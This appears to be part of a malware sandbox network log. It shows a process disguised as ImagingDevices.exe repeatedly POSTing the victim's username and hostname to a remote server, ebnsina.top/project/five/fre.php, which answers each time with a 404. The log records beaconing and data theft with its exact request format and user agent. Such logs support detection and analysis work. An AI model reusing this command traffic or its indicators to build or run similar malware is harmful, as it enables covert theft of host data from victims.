8	192.168.2.4	49748	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:32.267354012 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:32.392137051 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:32.821779966 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlLoOkkoZf2p6xvBGqRfeizrRl9Anbihs2MHV%2BqSXI0g9IXoXi0N4sf86LLCHQTk52xP0Zd9VvTgfUtzAVv34agVqOP8umKOPoQciwtTsUKJmNVs0v%2FGdoJAVV1ZSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d2d0d752248-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:33.093730927 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:33.218550920 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:33.509691000 CEST	617	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4XpqgCfeu1ZoskPsK1UT3BN3p4ufw2jNkUQcyOXOwcUGMTSV1FsqiBS1EzlWN58trYYBRa3bNJQXjn65YzarxTIhUnHu7oDPb4mFcc4cIqTEpArI9UM2Y45OugecQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d323a3a2589-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:33.791207075 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:33.915788889 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:34.342127085 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YsBZNFhzzDL8h422tw5PzNd7b8LS9WzwPpABb%2BYm7jSWSuJBz6eaPfq5rpQqCLaeDHvJLuTtgKgmqzzTUrDQ4rjzS4z7wjHILGpk3uYOobU8YepBDLjUAzNHWEqhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d3698e7749f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49751	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:34.610079050 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:34.735025883 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:35.177521944 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TN2WTt3PCir7nmFkPqJYso0eyGkOU%2BbF2Fg4EbDBb8RKyqsG8vGDzDm0515dK5XBWQ%2Fj2WLkLR0o%2BGR%2B%2F7pWmL67n3zDEPGwIpZK07GZPAFurso8SaO9CZsfFW9rQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d3bbc308752-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49752	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:35.452744961 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:35.578013897 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:35.871701002 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlDCyUiCtNrNJkpSyumsOQOCPg%2F6BAXJ1VTCf9GgfaiRgPgVfrHgM21Xq2D3AO2oMXYtdM9dU0R%2FBQD6TcFs7ydT5Bxo8wg8TNP2zRRqlCcfFu0jpShZ70vHwpeEKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d40fc4d8d96-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49753	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:36.151380062 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:36.276568890 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:36.567384005 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eb7D4rvwUQ36S8avH%2BKhYkKyYT%2BuOtyre%2F%2Fh0zvS41nmTcXuRoBMREmwdC6OskVALFfJruz7YEnF4La33%2BT06xBxmrCYYZmhvh6u2V7YmHxij6yqQfbdMDnfhTm%2BbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d455acfd9cd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49754	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:36.850228071 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:36.977451086 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:37.429876089 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUxDCJYDTaCONM4tLACgLZTR8O%2FZs%2FQr7amHwqdVX0o7vJ8qTC1VME%2BfknUFbZ5nQhTdXMZYt%2BKQzBCVBcYHpgdplejceSqh4r6FbVOBVJ%2BIKTZY1qW65P5%2BDpvfhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d49bc46d9a9-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49755	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:37.702888966 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:37.827876091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:38.131963015 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5n6Ls5spOPZ5gOx8eqUGzXo%2BG9yimxJQBtVyt3LmcblLJNsHUQkNAHZ6jitwxce1nrLSNUfBMU5hBR6eHjCf5Us3tglhHBnYBsAGEYZJwHrLsATON%2FoPTF3qwJaDAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d4f09300a3a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49756	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:38.407237053 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:38.531969070 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:38.835591078 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iZ%2FR%2BSCFcEGI26E8g5tap6vWBymBDIed1qiGcPnre5dEcdXdfQREB2gUn5cN5VNWpFNexIavg3vldS%2BDJ%2Fyos8zMkI1e2IBgHhK7IMo96scKnEv5MBtE48nAVPBg1A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d5369ba9acb-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49757	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:39.122189045 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:39.247241020 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:39.687850952 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyDsK4Fr5fka%2BcYxsVL1mIpbg2rfYnQlxcYFe0KlB%2FWe4VHSN6kq%2FDXqPpfSTnNEha8jLRnAfRY1wEs6%2FFNtzvJ238s5tBdce0n7PiWwXOmHk7WfhhLWhGJk%2B5NMjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d57ea94b3f1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49758	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:39.958518982 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:40.082890034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:40.526815891 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mkGeI%2F1kcEyDC9NBEunKFWRyBbYRrPxoDTAaKFyrCnqeygz8CDLCyYCunpWGU8mYhKUvmrNqcbwImwOPVZRvYGOnlYfUDPiEUSswD4i9%2FkKEeEHAKD9VfMkfxt9wuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d5d2fcd9ae9-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49759	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:40.804238081 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:40.928263903 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:41.214807034 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=avsSsUpvrlwy4z2yz8jgpM0MtihBgKVeHxtcA4thb8F5Ui0ApDhuKJRqSfNnn3Va7DSwR%2FSsCSDvW6rS2pMmZmo4EuX03B9gP37281ZZS%2F85WI2rKlZcpR0Cf%2BzEvQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d626c6edb15-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49760	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:41.484457016 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:41.608827114 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:42.052025080 CEST	635	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZ9yH%2FVOZrlKRgx5DOxKSMV2bjp6KRWlphB%2FVCaP8%2Fi60bDOQfSQ5SVin1vMAq%2BSSul%2F2OSDLWhZiu898Hd0G%2FC90FETRrm2kkSW1xCoBqk%2FZGlPA9MhTVa%2Fi%2BTHZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d66adf525b5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49761	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:42.314099073 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:42.439030886 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:42.879087925 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIKwPlyG46alv7VGAn7E6Kwr5ByIOp7OcTdJWUYISpkgU0lvWAzEqfTqKbFAI1lA%2FC3OCcznfXaeSeF%2BpouXOw6jRVDubDokeACZz8w1grQS4vddfCQP%2BLPOYRyUNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d6bdfca67de-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:43.152523994 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:43.277462006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:43.712430954 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ESkISCSeHtVOuvXm8GixihEdozJXpEcbgwBUduY%2F0HSYFGmLJvh07ht3vJV7kzrN5NfXGcVUUKoJM09txPQy3u3h6SfpxdABgSJ6yXaL79OM0WQ6aM4NO5dFldCvgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d711bb1336a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

